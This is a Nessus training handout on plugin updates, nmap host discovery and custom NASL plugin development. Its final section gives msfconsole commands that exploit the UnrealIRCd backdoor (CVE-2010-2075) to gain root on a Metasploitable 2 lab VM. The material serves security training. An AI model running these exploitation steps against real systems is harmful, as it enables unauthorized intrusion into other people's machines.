Nessus Training Session 3 - Advanced Topics Prepared by Ramsey Dow <ramsey@casaba.com> for NWACC Contents Pre-scan Workflow Update plugin library Identify targets Scan Automation Custom Plugin Development Plugin IDs Where the plugins are Running plugins from the command line Signed and unsigned scripts Debugging Example from the NASL documentation Optimizing your script Rules for plugins How to install a custom plugin Test the new custom plugin How to remove custom plugins Using Nessus with Metasploit Useful Web Sites and Resources Scan Automation Custom Plugin Development Using Nessus with Metasploit Pre-scan Workflow It’s quite alright to let Nessus do everything for you. It does use Nmap under the hood. However, I like to take more control myself. Aside from satisfying the control freak in me, this also allows me to exclude IPs of hosts I don’t want to scan. Update plugin library Tenable updates Nessus plugins on a daily basis. The Nessus daemon will pull new updates once per 24 hour period. However, new plugins can arrive at many times throughout the day. I tend to update plugins on the scan server prior to running any meaningful scan. sudo /opt/nessus/sbin/nessus-update-plugins Identify targets I have a scanning workspace that looks like this: scan\ archive\ 2013\ 01\ 02\ ... 10\ scripts\ I keep scan-related data in the archive directory, organized by year and month. I stash time-saving scripts in the scripts directory. On any given month when I perform scans against a regularly scheduled target, I set the SCANPATH variable: SCANPATH="archive/`date +%Y`/`date +%m`" Then I create the new workspace: mkdir -p $SCANPATH Now I can use nmap directly to perform host discovery using options that make sense for the engagement: sudo nmap --privileged -sn -oX ${SCANPATH}/network_name.xml ip/mask >& /dev/n ull At this step I can use nmap’s --exclude switch to ignore IPs, such as fragile printers. This gives me an XML file containing host discovery information. Useful, to be sure, but not consumable by Nessus. I wrote a Ruby script to remedy the situation. ./scripts/nmap2nessus.rb ${SCANPATH}/network_name.xml > ${SCANPATH}/network_t argets.txt nmap2nessus.rb consumes the XML output from nmap and converts it into a Nessus-style host list. I can upload this list directly into a Nessus scan template. Scan Automation lawnmower.rb demonstration. Custom Plugin Development NASL is the Nessus Attack Scripting Language. It is a C-like scripting language designed for implementing security tests. It comes with a couple of security guarantees: will not send any packet to a host other than the target host will not execute any commands on your local system In addition, NASL maintains a small memory footprint compared to other scripting languages. It is not robust like Python or Ruby. # This Example displays the FTP banner of the remote host : soc = open_sock_tcp(21); if(soc) { data = recv_line(socket:soc, length:1024); if(data) { display("The remote FTP banner is : \n", data, "\n"); } else { display("The remote FTP server seems to be tcp-wrapped\n"); } close(soc); } Plugin IDs Plugins are referenced by IDs. People should use 50000–52999 for custom plugins; the 60000–69999 range is used by Security Center when auto-generating plugins ID’s for compliance checks. Where the plugins are Plugins live in the /opt/nessus/lib/nessus/plugins directory. .inc files contain functions and are included by NASL scripts. .nasl files are Nessus plugins. Running plugins from the command line You use the nasl program to run Nessus plugins from the command line. nasl is meant to be run serverside, and not by users. If you are running nasl scripts on the command line then it is difficult to see what is happening. /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/fin ger.nasl This command checks for the presence of fingerd on localhost. nasl isn’t meant to be user-friendly, and doesn’t have output like you might expect. The -T option specifies that we want a debug trace written to a file named f.out. $ tail -n 2 f.out [finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 7 9 ) [finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0 nasl tried to connect to port 79 and failed, hence ret -> 0. fingerd is not running on this machine. Signed and unsigned scripts By default, Nessus won’t run unsigned scripts that perform privileged operations, where privileged means doing things which allow the script to escape its sandbox. Remember, NASL comes with security guarantees, including not doing unexpected bad things to the scan server running the script. If your script does privileged things then you will have to edit /opt/nessus/etc/nessus/nessusd.conf.imported and change the line that starts nasl_no_signature_check = no to yes. If you are performing a traditional network check, you do not need to change this setting. Additionally, you can pass the -X switch to nasl from the command line. This will cause nasl to skip the signature check. Doesn’t work with Nessus. For that you will have to modify the nessusd.conf.imported file. Debugging When writing your own scripts it can be useful to engage in bouts of printf style debugging to see what is going on. You’ve got two options: display() Writes to stdout stdout redirects to /var/nessus/logs/nessus.dump when run by nessusd debug_print() You need to include("global_settings.inc") in yours script This only fires if debug_level is non-zero Example from the NASL documentation $ /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/t est_ssh.nasl $ cat f.out [test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/ ssh ) [test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret -> [test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 ) [test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1 [test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , , 22 ) [test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000 [test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000 , ) [test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1 p1 Debian-4.. [test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 ) [test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0 Optimizing your script The best way to optimize your script is to tell nessusd when to not launch it. If your script depends on a TCP port being open then indicate that your script requires that port to be open. script_require_ports(80, "Services/www") Services/www is a symbolic value, as defined in the Nessus knowledge base. The Nessus knowledge base representes the state of a scan. Your script may require the presence of certain state in order to run e.g., anonymous ftp with writable directories. script_require_keys("ftp/anonymous", "ftp/writeable_dir") This will only execute the script if the remote FTP server offers an anonymous access and if there is a writeable directory in it. You can also exclude keys: script_exclude_keys(k1, k2, ...) This will cause nessusd to not execute your script if at least one of the keys given in argument is set in the knowledge base. Rules for plugins Your script must never interact with the user Your script must test one vulnerability Your script should belong to an existing family Look up in CVE to see if there is a definition of your script How to install a custom plugin First, copy it to the plugins directory. sudo cp plugin.nasl /opt/nessus/lib/nessus/plugins Make sure you don’t have a name conflict! Stop the Nessus daemon. sudo service nessusd stop Restart the Nessus daemon, instructing it to rebuild the plugin index. sudo /opt/nessus/sbin/nessusd -R nessusd -R takes a long time as it recompiles the entire plugin database. You can use nessusd -t instead, it tells nessusd to only recompile the plugins whose timestamp has changed since the last run. This is much faster. Test the new custom plugin Create a policy named ssh Disable all plugin families Enable service checks and administrative toolbox Scan a test host using the ssh policy Review the scan report Disable ssh on the test host Rescan the test host Review the new scan report Note that the lack of ssh on the test host is flagged as a vulnerability How to remove custom plugins Stop the Nessus daemon. sudo service nessusd stop Restart the Nessus daemon, instructing it to rebuild the plugin index. sudo /opt/nessus/sbin/nessusd -R The “Administrative toolbox” family will still show in policies that reference it. Clicking on the plugin group will do nothing since it contains no plugins (you removed them). The plugin family doesn’t show up as an option in new policies. This weird behavior is why there is a rule about creating new plugin families. Don’t do it! Using Nessus with Metasploit Using Nessus with Metasploit is pretty easy and definitely a fun way to spend a Saturday afternoon! I installed Metasploit Framework 4 on Ubuntu Desktop 13.04. Scan something using Nessus (10.211.55.7 in the example, below) Export the scan results in the NBE format scp the NBE file to your Metasploit host Login to the Metasploit host and follow this basic procedure: sudo msfconsole db_import bfd6a1940f2061ba5532f33c1197a359.nbe hosts services 10.211.55.7 vulns 10.211.55.7 -p 6667 search cve:2010-2075 use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOST 10.211.55.7 exploit Voila. root in just a few steps! For the record, my victim host was a VM running the Metasploitable 2 image. Useful Web Sites and Resources Scan Automation Nessus 5.0 REST Protocol Specification http://static.tenable.com/documentation/nessus_5.0_XMLRPC_protocol_guide.pdf CPAN Module Net::Nessus::XMLRPC - perl library for communication with Nessus scanner(v4.2+) via XMLRPC https://github.com/kost/nessus-xmlrpc-perl Ruby gem/library for Nessus XMLRPC interface and Nessus command line example https://github.com/kost/nessus-xmlrpc-ruby Python module written for automating tasks within the latest version of Nessus http://code.google.com/p/nessusxmlrpc/ Custom Plugin Development Complete list of Nessus plugins http://www.tenable.com/plugins/index.php?view=all The Nessus Attack Scripting Language Reference Guide http://www.dn-systems.org/boss/doc/nasl_guide–20050103.pdf NASL Documentation https://discussions.nessus.org/servlet/JiveServlet/download/5815–1228/nasl2_reference.pdf Using Nessus with Metasploit Metasploit penetration testing tool http://www.rapid7.com/products/metasploit/download.jsp (grab Metasploit Framework from the bottom of the page) Metasploitable 2 - intentionally vulnerable Linux virtual machine http://sourceforge.net/projects/metasploitable/files/Metasploitable2/